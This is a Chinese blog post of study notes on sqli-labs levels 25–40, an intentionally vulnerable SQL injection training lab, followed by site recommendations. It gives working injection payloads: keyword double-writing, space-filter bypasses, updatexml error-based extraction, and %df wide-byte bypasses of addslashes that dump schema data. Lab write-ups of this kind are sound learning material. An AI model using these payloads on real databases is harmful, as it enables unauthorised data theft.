sqli-labs练习(25~40)

最新推荐文章于 2024-07-12 07:13:33 发布
最新推荐文章于 2024-07-12 07:13:33 发布
阅读量1k 收藏 13
点赞数 26
文章标签: sql 笔记 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63526753/article/details/137321674
版权
本文详细描述了SQL注入的各种技术,包括基础注入中的单词绕过、空格和注释过滤,以及如何通过双写、连接符号和宽字节编码进行绕过。还提及了在不同编码环境下的特定注入方法和检测挑战。
摘要由CSDN通过智能技术生成

如有错误,欢迎各位师傅指正,感谢~❀❀

25,25a————所有“and”“or”都会被过滤掉,但只过滤一次;并且大写无法绕过,所以用双写绕过的方法

(25是' -- r;25a是数字注入)

?id=1' aandnd 1=2 -- r //验证注入点
?id=-1' union select 1,2,3 -- r
...方法即基础注入方式

需要注意:注入是单词含有“and”“or”的地方都要双写,否则被系统滤过就会报错。

26,26a————所有空格和注释都会被过滤

空格的其他符号都会被过滤掉,用基本注入时使用括号(不知道是我的命令错误还是本身就不适合使用基本注入的方式) 
但26a不显示报错信息,所以不能使用报错注入(使用盲注吧) 
语句连接:使用双写and和or或者使用连接符号 
连接符号————“ || ”

①
?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))),1))||'1=1
②
?id=1'anandd(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))),1))anandd'1=1

//其余步骤略

27,27a————过滤掉空格、注释符和union,select

总结:空格绕过用括号方法结合连接符号或and连接语句: 
字段绕过尝试大小写或者双写(或多写几次,这取决于它会将命令过滤几次) 

?id=1'and(updatexml(1,concat(0x7e,(selecseleselectctt(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))and'1=1

★有些时候判断注入点需要用(?id=1"and"1"="1)或者(?id=1"and"0)不能(?id=1"and"1=1)还有就是,要记得判断是数字型还是字符型

(27a不显示报错信息,使用盲注吧)

28————过滤空格和union select,无法显示报错信息,使用盲注

过滤(union select时,过滤的是(union select)而不是(union 和 select)使用“ uniunion selecton select ”绕过)

28a————只过滤union select

直接基础注入,只需要将union select双写 
但在最后一步出现了问题

?id=-1') uniunion selecton select 1,2,3 and ('0
...
?id=-1') uniunion selecton select 1,2,group_concat(username) from users and ('0  
 //在这一步出现报错

在源码中查看时发现了问题,当语句执行时代码变为如下: 

此时LIMIT 0,1生效,产生报错 
解决方法:在本关并没有过滤一些注释符号,换一种方式表达,注释掉后面的LIMIT 0,1就可以了。

?id=-1') uniunion selecton select 1,2,group_concat(username) from users -- r

29,30,31————基础注入

不知道是不是我的靶场有问题,这三关就是最基本的注入,没有什么特殊的地方。

下面是29:

宽字节注入 :
在MYSQL为GBK编码时————使用 %df 绕过 addslashes() 函数或开启了魔术单引号

32,33————宽字节注入:“ %df ”绕过

值得注意的是在爆表时我们会使用'users'或"users",此时的单引号或双引号会被加上“ \ ”符号
解决方法: 
1.直接将'users'转成十六进制编码:(ASCII编码十六进制为“7573657273”在前面加上0x)

?id=-1%df%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273%20--%20r

2.子查询

?id=-1%df%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1)%20--%20r

34————宽字节注入

(我不明白,我找注入点的时候一直报错,但这个地方可以注入)

35,36,37————宽字节(但是35是数字型,只需要注意爆列时将其转化成十六进制就行)

38————基础注入(攻略说可以使用堆叠注入,但我还没学好,不知道咋用)

39————基础注入(数字型)

40————基础注入(但不显示报错信息)

今天要买zs专辑
关注
  • 26
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs 11~14 多命通关攻略(报错注入)
两个月亮
01-16 533
由于该关卡中会提示错误信息,所以我们可以通过报错注入来爆破数据库
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 4465
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6530
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 2040
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
安装sqli-labs
10-22
本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
最新发布
技术笔记
07-12 708
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
SQL笔试题【数据岗】
房东的猫的博客
07-11 268
题目 4:输出一张 dws 表,查询过去任意日期的曝光活跃用户的 7 日留存率,输出字 段日 期,用户 id,7 日留存率具体表结构如下表 1 用户行为表:t_user_video_action_d l分区:ds(格式 yyyyMMdd) l主键:user_id、video_id l含义:一个用户对一个视频的所有行为聚合,每天增量 字段名字段含义类型。题目 3:计算每个用户每天第一次曝光视频的时间戳,运行速度越快越好,输出字段 日期, 用户 id,时间戳。
【postgresql】视图(View)
一个写了10年bug的程序员日常笔记。
07-10 562
PostgreSQL 中的视图(View)是一种虚拟表,其内容由 SQL 查询定义。视图可以简化复杂的 SQL 操作,使得用户能够以一种更直观、更易于理解的方式来访问和操作数据。PostgreSQL 视图是只读的,因此可能无法在视图上执行 DELETE、INSERT 或 UPDATE 语句。但是可以在视图上创建一个触发器,当尝试 DELETE、INSERT 或 UPDATE 视图时触发,需要做的动作在触发器内容中定义。
[高频 SQL 50 题(基础版)]第一千七百五十七题,可回收且低脂产品
weixin_45201305的博客
07-10 287
low_fats 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品是低脂产品,'N' 表示不是低脂产品。recyclable 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品可回收,而 'N' 表示不可回收。没什么难度,作为基础题五十题的第一题练手,现在也开始陆续写一些SQL,作为记录,和leetcode一起,大家都加油。编写解决方案找出既是低脂又是可回收的产品编号。是该表的主键(具有唯一值的列)。
SQL面试题-留存率计算
xiao4816的博客
07-07 375
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
sqlmap使用之-post注入、head注入(ua、cookie、referer)
weixin_51520483的博客
07-11 187
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
NoSQL之Redis配置与优化
henanchenxuyuan的博客
07-11 1243
Redis(RemoteDictionaryServer,远程字典型)是一个开源的、使用C语言编写的NoSQL数据库。Redis 基于内存运行并支持持久化,采用 key-value(键值对)的存储形式是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis 进程,而 Redis 的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis 进程,当多个客户端同时访问时,服务器的处理能力是会有一定程度的下降;
夜天之书 #99 改良 SQL Interval 语法:一次开源贡献的经历
Miracle
07-10 416
本文是 GreptimeDB 首位独立 Committer Eugene Tolbakov所作。在上一篇文章《GreptimeDB 首位独立 Committer Eugene Tolbakov 是怎样炼成的?》当中,我从社群维护者的视角介绍了 Eugene 的参与和成长之路。这篇文章是在此之后 Eugene 受到激励,从自己的角度出发,结合最近为 GreptimeDB 改良 SQL Interv...
Python 获取 SQL 指纹和 HASH 值
分享既学习
07-10 402
本文介绍一个提取 SQL 指纹的方法,就是将 SQL 语句的条件转换为?可用于脱敏和 SQL 聚类分析的场景。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值